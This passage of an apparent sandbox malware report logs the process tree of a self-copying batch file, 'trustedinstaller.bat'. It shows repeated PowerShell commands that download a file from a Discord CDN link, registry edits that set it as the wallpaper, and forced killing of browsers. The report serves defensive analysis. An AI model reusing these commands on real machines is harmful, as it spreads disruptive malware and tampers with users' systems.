    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:9900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:4368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5284
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7064
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:5080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    PID:4180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:296
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:932
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3780
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1184
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6376
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:1764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3248
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3180
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5672
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        
        PID:3680
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4560
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2948
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2232
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3384
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2052
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9300
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:2256
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:5228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1584
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3724
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1108
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3484
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4400
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6688
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:292
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5272
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:3744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3488
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5740
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:948
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:5240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3020
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2172
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:932
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6896
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:2720
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:5660
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:5012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:9984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:5136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8100
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:5580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8092
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6652
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8188
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:6664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:1664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3652
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3828
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:5244
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:2952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:5752
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:2880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:5088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:5816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:3400
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:7616
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:5884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2212
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
